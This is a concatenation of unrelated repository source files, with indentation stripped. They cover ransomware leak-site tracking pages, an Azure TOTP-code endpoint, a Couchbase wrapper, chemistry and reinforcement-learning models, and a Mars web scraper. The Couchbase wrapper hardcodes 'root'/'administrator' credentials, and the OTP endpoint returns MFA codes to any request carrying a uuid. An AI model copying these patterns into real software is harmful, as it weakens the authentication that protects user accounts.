line = '| [' + group['name'] + '](https://ransomwatch.telemetry.ltd/#/profiles?id=' + group['name'] + ') | ' + title + ' | ' + statusemoji + ' | ' + lastseen + ' | ' + host['fqdn'] + ' |'
writeline(index_sheet, line)
def sidebar():
'''
create a sidebar markdown report
'''
stdlog('generating sidebar')
sidebar = 'docs/_sidebar.md'
# delete contents of file
with open(sidebar, 'w') as f:
f.close()
writeline(sidebar, '- [home](README.md)')
writeline(sidebar, '- [group index](INDEX.md)')
writeline(sidebar, '- [recent posts](recentposts.md)')
writeline(sidebar, '- [stats & graphs](stats.md)')
writeline(sidebar, '- [group profiles](profiles.md)')
stdlog('sidebar generated')
def statspage():
'''
create a stats page in markdown containing the matplotlib graphs
'''
stdlog('generating stats page')
statspage = 'docs/stats.md'
# delete contents of file
with open(statspage, 'w') as f:
f.close()
writeline(statspage, '# 📊 stats')
writeline(statspage, '')
writeline(statspage, '_timestamp association commenced october 21"_')
writeline(statspage, '')
writeline(statspage, '')
writeline(statspage, '')
writeline(statspage, '')
writeline(statspage, '')
writeline(statspage, '')
stdlog('stats page generated')
def recentposts(top):
'''
create a list the last X posts (most recent)
'''
stdlog('finding recent posts')
posts = openjson('posts.json')
# sort the posts by timestamp - descending
sorted_posts = sorted(posts, key=lambda x: x['discovered'], reverse=True)
# create a list of the last X posts
recentposts = []
for post in sorted_posts:
recentposts.append(post)
if len(recentposts) == top:
break
stdlog('recent posts generated')
return recentposts
def recentpage():
'''create a markdown table for the last 100 posts based on the discovered value'''
fetching_count = 100
stdlog('generating recent posts page')
recentpage = 'docs/recentposts.md'
# delete contents of file
with open(recentpage, 'w') as f:
f.close()
writeline(recentpage, '# 📰 recent posts')
writeline(recentpage, '')
writeline(recentpage, '_last `' + str(fetching_count) + '` posts_')
writeline(recentpage, '')
writeline(recentpage, '| date | title | group |')
writeline(recentpage, '|---|---|---|')
# fetch the 100 most revent posts and add to ascending markdown table
for post in recentposts(fetching_count):
# show friendly date for discovered
date = post['discovered'].split(' ')[0]
# replace markdown tampering characters
title = post['post_title'].replace('|', '-')
group = post['group_name'].replace('|', '-')
grouplink = '[' + group + '](https://ransomwatch.telemetry.ltd/#/profiles?id=' + group + ')'
line = '| ' + date + ' | `' + title + '` | ' + grouplink + ' |'
writeline(recentpage, line)
stdlog('recent posts page generated')
def profilepage():
'''
create a profile page for each group in their unique markdown files within docs/profiles
'''
stdlog('generating profile pages')
profilepage = 'docs/profiles.md'
# delete contents of file
with open(profilepage, 'w') as f:
f.close()
writeline(profilepage, '# 🐦 profiles')
writeline(profilepage, '')
groups = openjson('groups.json')
for group in groups:
writeline(profilepage, '## ' + group['name'])
writeline(profilepage, '')
if group['captcha'] is True:
writeline(profilepage, ':warning: _has a captcha_')
writeline(profilepage, '')
if group['parser'] is True:
writeline(profilepage, '_parsing : `enabled`_')
writeline(profilepage, '')
else:
writeline(profilepage, '_parsing : `disabled`_')
writeline(profilepage, '')
# add notes if present
if group['meta'] is not None:
writeline(profilepage, '_`' + group['meta'] + '`_')
writeline(profilepage, '')
if group['javascript_render'] is True:
writeline(profilepage, '> fetching this site requires a headless browser for javascript processing')
writeline(profilepage, '')
if group['geckodriver'] is True:
writeline(profilepage, '> fetching this site uses geckodriver/selenium')
writeline(profilepage, '')
if group['profile'] is not None:
for profile in group['profile']:
writeline(profilepage, '- ' + profile)
writeline(profilepage, '')
writeline(profilepage, '| title | available | version | last visit | fqdn')
writeline(profilepage, '|---|---|---|---|---|')
for host in group['locations']:
# convert date to ddmmyyyy hh:mm
date = host['lastscrape'].split(' ')[0]
date = date.split('-')
date = date[2] + '/' + date[1] + '/' + date[0]
time = host['lastscrape'].split(' ')[1]
time = time.split(':')
time = time[0] + ':' + time[1]
if host['title'] is not None:
line = '| ' + host['title'].replace('|', '-') + ' | ' + str(host['available']) + ' | ' + str(host['version']) + ' | ' + time + ' ' + date + ' | `' + host['fqdn'] + '` |'
writeline(profilepage, line)
else:
line = '| none | ' + str(host['available']) + ' | ' + str(host['version']) + ' | ' + time + ' ' + date + ' | `' + host['fqdn'] + '` |'
writeline(profilepage, line)
writeline(profilepage, '')
writeline(profilepage, '| post | date |')
writeline(profilepage, '|---|---|')
posts = openjson('posts.json')
for post in posts:
if post['group_name'] == group['name']:
date = post['discovered'].split(' ')[0]
date = date.split('-')
date = date[2] + '/' + date[1] + '/' + date[0]
line = '| ' + '`' + post['post_title'].replace('|', '') + '`' + ' | ' + date + ' |'
writeline(profilepage, line)
writeline(profilepage, '')
stdlog('profile page for ' + group['name'] + ' generated')
stdlog('profile page generation complete')
def main():
stdlog('generating doco')
mainpage()
indexpage()
sidebar()
recentpage()
statspage()
profilepage()
# if posts.json has been modified within the last 45 mins, assume new posts discovered and recreate graphs
if os.path.getmtime('posts.json') > (time.time() - (45 * 60)):
stdlog('posts.json has been modified within the last 45 mins, assuming new posts discovered and recreating graphs')
trend_posts_per_day()
plot_posts_by_group()
pie_posts_by_group()
else:
stdlog('posts.json has not been modified within the last 45 mins, assuming no new posts discovered')
``` |
{
"source": "joshhighet/sharedmfa",
"score": 2
} |
#### File: sharedmfa/get-mfa-code/__init__.py
```python
import os
import json
import logging
import datetime
import urllib.parse as urlparse
from urllib.parse import parse_qs
import azure.functions as func
import pyotp
from azure.keyvault.secrets import SecretClient
from azure.identity import DefaultAzureCredential
from azure.cosmosdb.table.tableservice import TableService
from azure.cosmosdb.table.models import Entity
#fetch keyvault name from environment variable (function configuration setting)
kvname = os.environ["KEY_VAULT_NAME"]
kvfqdn = f"https://{kvname}.vault.azure.net"
kv = SecretClient(vault_url=kvfqdn, credential=DefaultAzureCredential())
#using the AzWebJobs environment variable, connect to azure table storage
stor_acc_conn_string = os.environ['AzureWebJobsStorage']
tables = TableService(connection_string=stor_acc_conn_string)
def main(req: func.HttpRequest) -> func.HttpResponse:
"""fetch uuid from inbound url query parameter"""
uuid = req.params.get('uuid')
if not uuid:
try:
req_body = req.get_json()
except ValueError:
pass
else:
uuid = req_body.get('uuid')
#if the uuid has been identified
if uuid:
#get otp secret object from key vault by reference to uuid
otpauthkv = kv.get_secret(uuid)
#get otp secret value from object
totpseed = otpauthkv.value
#calculate pin from otp secret
otpgen = pyotp.TOTP(totpseed)
totp = otpgen.now()
#calculate time-to-live of pin (30 second lifespan)
seconds_left = otpgen.interval - datetime.datetime.now().timestamp() % otpgen.interval
miliseconds_left = seconds_left * 1000
#form json response and respond
data = {}
data['otp'] = totp
data['expires'] = miliseconds_left
json_data = json.dumps(data)
return func.HttpResponse(json_data)
else:
return func.HttpResponse(
"no uuid recieved.",
status_code=400
)
``` |
{
"source": "joshhills/dissertation-project",
"score": 3
} |
#### File: source/shared/database.py
```python
from couchbase.cluster import Cluster
from couchbase.cluster import PasswordAuthenticator
class Database:
def store_job_state(self, product_id):
"""
Log that scraping for a product has begun.
:param product_id:
"""
raise NotImplementedError("Class %s doesn't implement from_json()" % self.__class__.__name__)
class Couchbase(Database):
def __init__(self):
# Define connection parameters.
authenticator = PasswordAuthenticator('root', 'administrator')
self.cluster = Cluster('couchbase://localhost')
self.cluster.authenticate(authenticator=authenticator)
def store_job_state(self, product_id):
cluster = self.cluster.open_bucket('job')
# Learn how to do things with this.
return
``` |
{
"source": "joshhochuli/OpenChem",
"score": 2
} |
#### File: openchem/layers/stack_augmentation.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
class StackAugmentation(nn.Module):
def __init__(self, stack_width, stack_depth, in_features, use_cuda):
super(StackAugmentation, self).__init__()
self.use_cuda = use_cuda
self.stack_width = stack_width
self.stack_depth = stack_depth
self.in_features = in_features
self.stack_controls_layer = nn.Linear(in_features=in_features,
out_features=3)
self.stack_input_layer = nn.Linear(in_features=in_features,
out_features=self.stack_width)
def forward(self, input_val, prev_stack):
batch_size = prev_stack.size(0)
controls = self.stack_controls_layer(input_val.squeeze(0))
controls = F.softmax(controls, dim=1)
controls = controls.view(-1, 3, 1, 1)
stack_input = self.stack_input_layer(input_val)
stack_input = F.tanh(stack_input)
stack_input = stack_input.permute(1, 0, 2)
zeros_at_the_bottom = torch.zeros(batch_size, 1, self.stack_width)
if self.use_cuda:
zeros_at_the_bottom = torch.tensor(zeros_at_the_bottom.cuda(),
requires_grad=True)
else:
zeros_at_the_bottom = torch.tensor(zeros_at_the_bottom,
requires_grad=True)
a_push, a_pop, a_no_op = controls[:, 0], controls[:, 1], controls[:, 2]
stack_down = torch.cat((prev_stack[:, 1:], zeros_at_the_bottom), dim=1)
stack_up = torch.cat((stack_input, prev_stack[:, :-1]), dim=1)
new_stack = a_no_op * prev_stack + a_push * stack_up + \
a_pop * stack_down
return new_stack
def init_stack(self, batch_size):
result = torch.zeros(batch_size, self.stack_depth, self.stack_width)
if self.use_cuda:
return torch.tensor(result.cuda(), requires_grad=True)
else:
return torch.tensor(result, requires_grad=True)
```
#### File: openchem/models/GenerativeRNN.py
```python
from openchem.models.openchem_model import OpenChemModel
from openchem.layers.stack_augmentation import StackAugmentation
from openchem.data.utils import seq2tensor, cut_padding
import torch
import numpy as np
class GenerativeRNN(OpenChemModel):
def __init__(self, params):
super(GenerativeRNN, self).__init__(params)
self.has_stack = params['has_stack']
if self.has_stack:
self.Stack = StackAugmentation(use_cuda=self.use_cuda,
**self.params['stack_params'])
self.embedding = self.params['embedding']
self.embed_params = self.params['embedding_params']
self.Embedding = self.embedding(self.embed_params)
self.encoder = self.params['encoder']
self.encoder_params = self.params['encoder_params']
self.Encoder = self.encoder(self.encoder_params, self.use_cuda)
self.mlp = self.params['mlp']
self.mlp_params = self.params['mlp_params']
self.MLP = self.mlp(self.mlp_params)
def forward(self, inp_seq, eval=False):
"""Generator forward function."""
if eval:
self.eval()
else:
self.train()
batch_size = inp_seq.size()[0]
seq_len = inp_seq.size()[1]
n_classes = self.MLP.hidden_size[-1]
result = torch.zeros(batch_size, seq_len, n_classes,
requires_grad=True)
if self.use_cuda:
result = result.cuda()
hidden = self.Encoder.init_hidden(batch_size)
if self.has_stack:
stack = self.Stack.init_stack(batch_size)
for c in range(seq_len):
inp_token = self.Embedding(inp_seq[:, c].view(batch_size, -1))
if self.has_stack:
stack = self.Stack(hidden, stack)
stack_top = stack[:, 0, :].unsqueeze(1)
inp_token = torch.cat((inp_token, stack_top), dim=2)
output, hidden = self.Encoder(inp_token, hidden)
result[:, c, :] = self.MLP(output)
return result.view(-1, n_classes)
def infer(self, prime_str, n_to_generate, max_len, tokens, temperature=0.8):
self.eval()
tokens = np.array(tokens).reshape(-1)
prime_str = [prime_str] * n_to_generate
tokens = list(tokens[0])
num_tokens = len(tokens)
prime_input = seq2tensor(prime_str, tokens)
tokens = np.array(tokens)
batch_size = prime_input.shape[0]
seq_len = prime_input.shape[1] - 1
hidden = self.Encoder.init_hidden(batch_size)
prime_input = torch.tensor(prime_input).long()
if self.use_cuda:
prime_input = prime_input.cuda()
if self.has_stack:
stack = self.Stack.init_stack(batch_size)
for c in range(seq_len):
inp_token = self.Embedding(prime_input[:, c].view(batch_size, -1))
if self.has_stack:
stack = self.Stack(hidden, stack)
stack_top = stack[:, 0, :].unsqueeze(1)
inp_token = torch.cat((inp_token, stack_top), dim=2)
output, hidden = self.Encoder(inp_token, hidden)
inp = prime_input[:, -1]
predicted = [' '] * (batch_size * (max_len - seq_len))
predicted = np.reshape(predicted, (batch_size, max_len - seq_len))
for c in range(max_len - seq_len):
inp_token = self.Embedding(inp.view(batch_size, -1))
if self.has_stack:
stack = self.Stack(hidden, stack)
stack_top = stack[:, 0, :].unsqueeze(1)
inp_token = torch.cat((inp_token, stack_top), dim=2)
output, hidden = self.Encoder(inp_token, hidden)
output = self.MLP(output)
output_dist = output.data.view(-1).div(temperature).exp()
output_dist = output_dist.view(batch_size, num_tokens)
top_i = torch.multinomial(output_dist, 1)
# Add predicted character to string and use as next input
predicted_char = tokens[top_i]
predicted[:, c] = predicted_char[:, 0]
inp = torch.tensor(top_i)
return predicted
def cast_inputs(self, sample):
sample_seq = sample['tokenized_smiles']
lengths = sample['length']
max_len = lengths.max(dim=0)[0].cpu().numpy()
batch_size = len(lengths)
sample_seq = cut_padding(sample_seq, lengths, padding='right')
target = sample_seq[:, 1:].contiguous().view(
(batch_size * (max_len - 1), 1))
seq = sample_seq[:, :-1]
seq = torch.tensor(seq, requires_grad=True).long()
target = torch.tensor(target).long()
seq = seq.cuda()
target = target.cuda()
return seq, target.squeeze(1)
```
#### File: openchem/models/MoleculeProtein2Label.py
```python
from openchem.models.openchem_model import OpenChemModel
from openchem.optimizer.openchem_optimizer import OpenChemOptimizer
from openchem.optimizer.openchem_lr_scheduler import OpenChemLRScheduler
from openchem.data.utils import cut_padding
import torch
class MoleculeProtein2Label(OpenChemModel):
r"""
Creates a model that predicts one or multiple labels given two sequences as
input. Embeddings for each input are extracted separately with Embedding
layer, followed by encoder (could be RNN or CNN encoder) and then merged
together. Last layer of the model is multi-layer perceptron.
Args:
params (dict): dictionary describing model architecture.
"""
def __init__(self, params):
super(MoleculeProtein2Label, self).__init__(params)
self.mol_embedding = self.params['mol_embedding']
self.mol_embed_params = self.params['mol_embedding_params']
self.prot_embedding = self.params['prot_embedding']
self.prot_embed_params = self.params['prot_embedding_params']
self.MolEmbedding = self.mol_embedding(self.mol_embed_params)
self.ProtEmbedding = self.prot_embedding(self.prot_embed_params)
self.mol_encoder = self.params['mol_encoder']
self.mol_encoder_params = self.params['mol_encoder_params']
self.prot_encoder = self.params['prot_encoder']
self.prot_encoder_params = self.params['prot_encoder_params']
self.MolEncoder = self.mol_encoder(self.mol_encoder_params,
self.use_cuda)
self.ProtEncoder = self.prot_encoder(self.prot_encoder_params,
self.use_cuda)
self.merge = self.params['merge']
self.mlp = self.params['mlp']
self.mlp_params = self.params['mlp_params']
self.MLP = self.mlp(self.mlp_params)
def forward(self, inp, eval=False):
if eval:
self.eval()
else:
self.train()
mol = inp[0]
prot = inp[1]
mol_embedded = self.MolEmbedding(mol)
mol_output, _ = self.MolEncoder(mol_embedded)
prot_embedded = self.ProtEmbedding(prot)
prot_output, _ = self.ProtEncoder(prot_embedded)
if self.merge == 'mul':
output = mol_output*prot_output
elif self.merge == 'concat':
output = torch.cat((mol_output, prot_output), 1)
else:
raise ValueError('Invalid value for merge')
output = self.MLP(output)
return output
def cast_inputs(self, sample):
batch_mols = cut_padding(sample['tokenized_smiles'], sample['mol_length'],
padding='left')
batch_prots = cut_padding(sample['tokenized_protein'], sample['prot_length'],
padding='left')
batch_mols = torch.tensor(batch_mols, requires_grad=True).long()
batch_prots = torch.tensor(batch_prots, requires_grad=True).long()
batch_labels = torch.tensor(sample['labels'])
if self.task == 'classification':
batch_labels = batch_labels.long()
elif self.task == 'regression':
batch_labels = batch_labels.float()
if self.use_cuda:
batch_mols = batch_mols.cuda()
batch_prots = batch_prots.cuda()
batch_labels = batch_labels.cuda()
return (batch_mols, batch_prots), batch_labels
``` |
{
"source": "joshholla/neuro_noodle",
"score": 3
} |
#### File: joshholla/neuro_noodle/model.py
```python
import torch
from torch import nn
from torch.nn import functional as F
use_cuda = torch.cuda.is_available()
# ----------------------------------------------------------------------------------
# BUILDING OUR NEURAL NETWORK
# ----------------------------------------------------------------------------------
class Autoencoder(torch.nn.Module):
# The AutoEncoder Model
# ------------------------------------------------------------------------------
def __init__(self):
super(Autoencoder,self).__init__()
self.encoder = nn.Sequential(
nn.Linear(506 * 650, 256),
nn.ReLU(inplace=True),
nn.Linear(256, 40), # check if it is 256, or something else
nn.ReLU(inplace=True)
)
self.decoder = nn.Sequential(
nn.Linear(40, 256),
nn.ReLU(inplace=True),
nn.Linear(256, 506 * 650),
nn.ReLU(inplace=True)
)
def forward(self, x):
x = self.encoder(x)
return self.decoder(x)
# For usage after training is done
# ------------------------------------------------------------------------------
def encode(self, x):
# Generate latent representation of the input image
x = self.encoder(x)
return x
def decode(self, x):
# Generate image from the decoder.
x = self.decoder(x)
return x
def get_model():
# Returns the model and optimizer
model = Autoencoder()
optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
return model, optimizer
``` |
{
"source": "joshholla/neuroRL",
"score": 3
} |
#### File: neuroRL/envs/empty.py
```python
from gym_minigrid.minigrid import *
from gym_minigrid.register import register
class EmptyEnv(MiniGridEnv):
"""
Empty grid environment, no obstacles, sparse reward
"""
def __init__(
self,
size=8,
agent_start_pos=(1,1),
agent_start_dir=0,
):
self.agent_start_pos = agent_start_pos
self.agent_start_dir = agent_start_dir
super().__init__(
grid_size=size,
max_steps=4*size*size,
# Set this to True for maximum speed
see_through_walls=True
)
def _gen_grid(self, width, height):
# Create an empty grid
self.grid = Grid(width, height)
# Generate the surrounding walls
self.grid.wall_rect(0, 0, width, height)
# Place a goal square in the bottom-right corner
self.put_obj(Goal(), width - 2, height - 2)
# Place the agent
if self.agent_start_pos is not None:
self.agent_pos = self.agent_start_pos
self.agent_dir = self.agent_start_dir
else:
self.place_agent()
# tryingn to align the initial directions.
self.agent_dir = self.agent_start_dir
self.mission = "get to the green goal square"
class EmptyRandomEnv10x10(EmptyEnv):
def __init__(self):
super().__init__(size=10, agent_start_pos=None)
class EmptyEnv10x10(EmptyEnv):
def __init__(self):
super().__init__(size=10)
register(
id='MiniGrid-Empty-Random-10x10-v0',
entry_point='neuroRL.envs:EmptyRandomEnv10x10'
)
register(
id='MiniGrid-Empty-10x10-v0',
entry_point='neuroRL.envs:EmptyEnv10x10'
)
``` |
{
"source": "joshholla/prob_mbrl",
"score": 3
} |
#### File: prob_mbrl/models/activations.py
```python
import torch
class Swish(torch.nn.Module):
def forward(self, x):
return x*x.sigmoid()
class Sin(torch.nn.Module):
def forward(self, x):
return x.sin()
class SinLU(torch.nn.Module):
def __init__(self):
super(SinLU, self).__init__()
self.thr = torch.nn.Threshold(0, 0)
def forward(self, x):
return self.thr(x) - self.thr(-x).sin()
```
#### File: prob_mbrl/utils/core.py
```python
import numpy as np
import torch
import os
import warnings
from collections import Iterable
from itertools import chain
from matplotlib import pyplot as plt
from .rollout import rollout
def plot_sample(data, axarr, colors=None, **kwargs):
H, D = data.shape
plots = []
if colors is None:
colors = ['steelblue'] * D
N = len(colors)
for d in range(D):
pl, = axarr[d].plot(np.arange(H),
data[:, d],
color=colors[d % N],
**kwargs)
plots.append(pl)
return plots
def plot_mean_var(data, axarr, colors=None, stdevs=2, **kwargs):
N, H, D = data.shape
plots = []
mean = data.mean(0)
std = data.std(0)
t = np.arange(H)
if colors is None:
colors = ['steelblue'] * D
N = len(colors)
for d in range(D):
pl, = axarr[d].plot(t, mean[:, d], color=colors[d % N], **kwargs)
alpha = kwargs.get('alpha', 0.5)
for i in range(1, stdevs + 1):
alpha = alpha * 0.8
lower_bound = mean[:, d] - i * std[:, d]
upper_bound = mean[:, d] + i * std[:, d]
axarr[d].fill_between(t,
lower_bound,
upper_bound,
alpha=alpha,
color=pl.get_color())
plots.append(pl)
return plots
def plot_trajectories(
states,
actions,
rewards,
names=['Rolled out States', 'Predicted Actions', 'Predicted Rewards'],
timeout=0.5,
plot_samples=True):
for name in names:
fig = plt.figure(name)
fig.clear()
fig1, axarr1 = plt.subplots(states.shape[-1],
num=names[0],
sharex=True,
figsize=(16, 9))
fig2, axarr2 = plt.subplots(actions.shape[-1],
num=names[1],
sharex=True,
figsize=(16, 3))
fig3, axarr3 = plt.subplots(rewards.shape[-1],
num=names[2],
sharex=True,
figsize=(16, 3))
axarr1 = [axarr1] if not isinstance(axarr1, Iterable) else axarr1
axarr2 = [axarr2] if not isinstance(axarr2, Iterable) else axarr2
axarr3 = [axarr3] if not isinstance(axarr3, Iterable) else axarr3
if plot_samples:
c1 = c2 = c3 = None
for i, (st, ac, rw) in enumerate(zip(states, actions, rewards)):
r1 = plot_sample(st, axarr1, c1, alpha=0.3)
r2 = plot_sample(ac, axarr2, c2, alpha=0.3)
r3 = plot_sample(rw, axarr3, c3, alpha=0.3)
c1 = [r.get_color() for r in r1]
c2 = [r.get_color() for r in r2]
c3 = [r.get_color() for r in r3]
else:
plot_mean_var(states, axarr1)
plot_mean_var(actions, axarr2)
plot_mean_var(rewards, axarr3)
for ax in chain(axarr1, axarr2, axarr3):
ax.figure.canvas.draw()
if timeout > 0:
plt.show(block=False)
plt.waitforbuttonpress(timeout)
else:
plt.show()
def plot_rollout(x0, forward, pol, steps):
trajs = rollout(x0,
forward,
pol,
steps,
resample_model=False,
resample_policy=False,
resample_particles=False)
states, actions, rewards = (torch.stack(x).transpose(
0, 1).detach().cpu().numpy() for x in trajs[:3])
plot_trajectories(states, actions, rewards)
def jacobian(y, x, **kwargs):
"""Evaluates the jacobian of y w.r.t x safely.
Args:
y (Tensor<m>): Tensor to differentiate.
x (Tensor<n>): Tensor to differentiate with respect to.
**kwargs: Additional key-word arguments to pass to `grad()`.
Returns:
Jacobian (Tensor<m, n>).
"""
J = [torch.autograd.grad(y[i], x, **kwargs)[0] for i in range(y.shape[0])]
J = torch.stack(J)
J.requires_grad_()
return J
def batch_jacobian(f, x, out_dims=None):
if out_dims is None:
y = f(x)
out_dims = y.shape[-1]
x_rep = x.repeat(out_dims, 1)
x_rep = torch.tensor(x_rep, requires_grad=True)
y_rep = f(x_rep)
dydx = torch.autograd.grad(y_rep,
x_rep,
torch.eye(x.shape[-1]),
allow_unused=True,
retain_graph=True)
return dydx
def polyak_averaging(current, target, tau=0.005):
for param, target_param in zip(current.parameters(), target.parameters()):
target_param.data.copy_(tau * param.data +
(1 - tau) * target_param.data)
def perturb_initial_action(i, states, actions):
if i == 0:
actions = actions + 1e-1 * (torch.randint(0,
2,
actions.shape[0:],
device=actions.device,
dtype=actions.dtype) *
actions.std(0)).detach()
return states, actions
def threshold_linear(x, y0, yend, x0, xend):
y = (x - x0) * (yend - y0) / (xend - x0) + y0
return np.maximum(y0, np.minimum(yend, y)).astype(np.int32)
def sin_squashing_fn(x):
'''
Periodic squashing function from PILCO.
Bounds the output to be between -1 and 1
'''
xx = torch.stack([x, 3 * x]).sin()
scale = torch.tensor([9.0, 1.0], device=x.device,
dtype=x.dtype)[[None] * x.dim()].transpose(0, -1)
return 0.125 * (xx * scale).sum(0)
def load_checkpoint(path, dyn, pol, exp, val=None):
msg = "Unable to load dynamics model parameters at {}"
try:
dyn_params = torch.load(os.path.join(path, 'latest_dynamics.pth.tar'))
dyn.load(dyn_params)
except Exception:
warnings.warn(msg.format(path, "latest_dynamics.pth.tar"))
try:
pol_params = torch.load(os.path.join(path, 'latest_policy.pth.tar'))
pol.load(pol_params)
except Exception:
warnings.warn(msg.format(path, "latest_policy.pth.tar"))
if val is not None:
try:
val_path = os.path.join(path, 'latest_critic.pth.tar')
val_params = torch.load(val_path)
val.load(val_params)
except Exception:
warnings.warn(msg.format(val_path))
try:
exp_path = os.path.join(path, 'experience.pth.tar')
exp.load(exp_path)
except Exception:
warnings.warn(msg.format(exp_path))
``` |
{
"source": "joshhopkins3/web-scraping-challenge",
"score": 3
} |
#### File: web-scraping-challenge/Missions_to_Mars/scrape_mars.py
```python
from splinter import Browser, browser
from bs4 import BeautifulSoup as bs
import pandas as pd
def init_browser():
executable_path = {'executable_path': "/Users/joshhopkins/.wdm/drivers/chromedriver/mac64/91.0.4472.101/chromedriver"}
browser = Browser("chrome", **executable_path, headless=False)
def scrape():
browser = init_browser()
# --- Visit Mars News site ---
browser.visit('https://mars.nasa.gov/news/')
# Scrape page into Soup
html = browser.html
soup = bs(html, "html.parser")
# Get the first news title
titles = soup.find_all('div', class_='content_title')
news_title = titles[0].text
# Get the corresponding paragraph text
paragraphs = soup.find_all('div', class_='article_teaser_body')
news_paragraph= paragraphs[0].text
# --- Visit JPL site for featured Mars image ---
browser.visit('hhttps://data-class-jpl-space.s3.amazonaws.com/JPL_Space/index.html')
# Scrape page into Soup
html = browser.html
soup = bs(html, 'html.parser')
# Search for image source
img = soup.find_all('img', class_='headerimage fade-in')
source = soup.find('img', class_='headerimage fade-in').get('src')
url = 'https://data-class-jpl-space.s3.amazonaws.com/JPL_Space/'
feat_url = url + source
# --- Use Pandas to scrape data ---
tables = pd.read_html('https://space-facts.com/mars/')
# Take second table for Mars facts
mars_df = tables[1]
# Convert table to html
mars_facts = [mars_df.to_html(classes='data table table-borderless', index=False, header=False, border=0)]
# --- Visit USGS Astrogeology Site ---
browser.visit('https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars')
# Search for Hemisphere titles
html = browser.html
soup = bs(html, 'html.parser')
hemispheres = []
# Search for the names of all four hemispheres
results = soup.find_all('div', class_="collapsible results")
hemi_names = results[0].find_all('h3')
# Get text and store in list
for name in hemi_names:
hemispheres.append(name.text)
# Search for the names of all four hemispheres
results = soup.find_all('div', class_="collapsible results")
hemispheres = results[0].find_all('h3')
# Get text and store in list
for name in hemispheres:
hemi_names.append(name.text)
# Search for thumbnail links
thumbnail_results = results[0].find_all('a')
thumbnail_links = []
for thumbnail in thumbnail_results:
# If the thumbnail element has an image...
if (thumbnail.img):
# then grab the attached link
thumbnail_url = 'https://astrogeology.usgs.gov/' + thumbnail['href']
# Append list with links
thumbnail_links.append(thumbnail_url)
# --- Extract Image URLs ---
full_imgs = []
for url in thumbnail_links:
# Click through each thumbanil link
browser.visit(url)
html = browser.html
soup = bs(html, 'html.parser')
# Scrape each page for the relative image path
results = soup.find_all('img', class_='wide-image')
relative_img_path = results[0]['src']
# Combine the reltaive image path to get the full url
img_link = 'https://astrogeology.usgs.gov/' + relative_img_path
# Add full image links to a list
full_imgs.append(img_link)
# --- Zip together the list of hemisphere names and hemisphere image links ---
mars_zip = zip(hemispheres, full_imgs)
hemisphere_image_urls = []
# Iterate through the zipped object
for title, img in mars_zip:
mars_hemi_dict = {}
# Add hemisphere title to dictionary
mars_hemi_dict['title'] = title
# Add image url to dictionary
mars_hemi_dict['img_url'] = img
# Append the list with dictionaries
hemisphere_image_urls.append(mars_hemi_dict)
# --- Store data in a dictionary ---
mars_data = {
"news_title": news_title,
"news_paragraph": news_paragraph,
"featured_image": feat_url,
"mars_facts": mars_facts,
"hemispheres": hemisphere_image_urls
}
# Close the browser after scraping
browser.quit()
# Return results
return mars_data
``` |
{
"source": "josh-howes/sklearn-stacking",
"score": 3
} |
#### File: sklearn-stacking/ensemble/stacking_regressor.py
```python
import numpy as np
from sklearn.base import BaseEstimator, RegressorMixin, TransformerMixin, clone
from sklearn.externals import six
from sklearn.utils.validation import check_is_fitted
from sklearn.linear_model import Lasso
from sklearn.cross_validation import train_test_split
from sklearn.externals.joblib import Parallel, delayed
def _parallel_fit(estimator, X, y):
fitted_estimator = clone(estimator).fit(X, y)
return fitted_estimator
class StackingRegressor(BaseEstimator, RegressorMixin, TransformerMixin):
"""Stacked Generalization (Stacking) Model.
Parameters
----------
estimators : list of regressors
Invoking the ``fit`` method on the ``StackingRegressor`` will fit clones
of those original estimators that will be stored in the class attribute
`self.estimators_`.
combiner : regressor or None, optional (default=None)
The base regresor to fit on a test train split of the estimators predictions.
If None, then the base estimator is a linear regressor model.
cross_val_test_size : float, optional (default=0.33)
random_state : int or None, optional (default=None)
Attributes
----------
estimators_ : list of regressors
The collection of fitted sub-estimators.
combiner_ : regressor
Fitted combining regressor.
"""
def __init__(self, estimators, combiner=None, cross_val_test_size=0.33, random_state=None):
self.estimators = estimators
self.combiner = combiner
self.cross_val_test_size = cross_val_test_size
self.random_state = random_state
def fit(self, X, y):
""" Fit the estimators.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples and
n_features is the number of features.
y : array-like, shape = [n_samples]
Target values.
Returns
-------
self : object
"""
if self.estimators is None or len(self.estimators) == 0:
raise AttributeError('Invalid `estimators` attribute, `estimators`'
' should be a list of estimators.')
if self.combiner is None:
# Normalizing and contraining coefficients to postive numbers helps with multilinearity
self.combiner = Lasso(alpha=1e-9, positive=True, fit_intercept=False, normalize=True)
if not isinstance(self.combiner, RegressorMixin):
raise AttributeError('Invalid `combiner` attribute, `combiner`'
' should be an instance of a regressor.')
X_train, X_test, y_train, y_test = train_test_split(X,
y,
test_size=self.cross_val_test_size,
random_state=self.random_state)
n_estimators = len(self.estimators)
self.estimators_ = Parallel(n_jobs=n_estimators)(
delayed(_parallel_fit)(
estimator,
X_train,
y_train
)
for estimator in self.estimators)
X_stack = np.asarray([estimator.predict(X_test) for estimator in self.estimators_]).T
self.combiner_ = self.combiner.fit(X_stack, y_test)
return self
def predict(self, X):
""" Predict class labels for X.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples and
n_features is the number of features.
Returns
----------
predictions : array-like, shape = [n_samples]
Regressed values
"""
check_is_fitted(self, 'estimators_')
check_is_fitted(self, 'combiner_')
X_stack = np.asarray([estimator.predict(X) for estimator in self.estimators_]).T
return self.combiner_.predict(X_stack)
def transform(self, X):
"""Return class labels or probabilities for X for each estimator.
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples and
n_features is the number of features.
Returns
-------
array-like = [n_classifiers, n_samples]
Class labels predicted by each classifier.
"""
check_is_fitted(self, 'estimators_')
check_is_fitted(self, 'combiner_')
return self.predict(X)
def get_params(self, deep=False):
"""Return estimator parameter names for GridSearch support"""
if not deep:
return super(StackingRegressor, self).get_params(deep=False)
else:
# TODO: this will not work, need to implement `named_estimators`
raise NotImplementedError("`deep` attribute not yet supported.")
out = super(StackingRegressor, self).get_params(deep=False)
out.update(self.named_estimators.copy())
for name, step in six.iteritems(self.named_estimators):
for key, value in six.iteritems(step.get_params(deep=True)):
out['%s__%s' % (name, key)] = value
return out
``` |
{
"source": "JoshHumpherey/Financial_Calculators",
"score": 4
} |
#### File: JoshHumpherey/Financial_Calculators/investment_growth.py
```python
import tkinter as tk
